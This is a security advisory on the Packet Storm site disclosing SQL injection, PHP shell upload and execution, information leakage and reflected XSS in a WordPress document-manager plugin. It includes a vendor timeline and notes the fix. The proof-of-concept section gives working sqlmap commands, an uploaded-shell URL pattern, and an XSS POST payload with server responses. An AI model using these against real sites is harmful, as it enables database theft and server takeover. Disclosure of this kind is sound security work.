Exploit the possiblities

WordPress SP Projects And Document Manager 2.5.9.6 XSS / SQL Injection

WordPress SP Projects And Document Manager 2.5.9.6 XSS / SQL Injection
Posted Mar 7, 2016
Authored by Michael Helwig

WordPress SP Projects and Document Manager plugin version 2.5.9.6 suffers from code execution, cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, code execution, xss, sql injection, file upload
MD5 | f0ee8e78d641daa37faf343aa8631f66

WordPress SP Projects And Document Manager 2.5.9.6 XSS / SQL Injection

Change Mirror Download
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
===============================================================================

The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.

PoC
===============================================================================


1. SQL-Injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:

- The injections in the "id"-parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=download-project&id=1

- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/\
WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
OR (1=1 *" --dbms mysql



2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like

/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

e.g.
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\
/1/shell.php

Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.


3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=get-file-info&id=1

-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------

Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).

4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
</script></p>
---------------


Timeline
===============================================================================

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


Solution
===============================================================================

Update to latest version

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close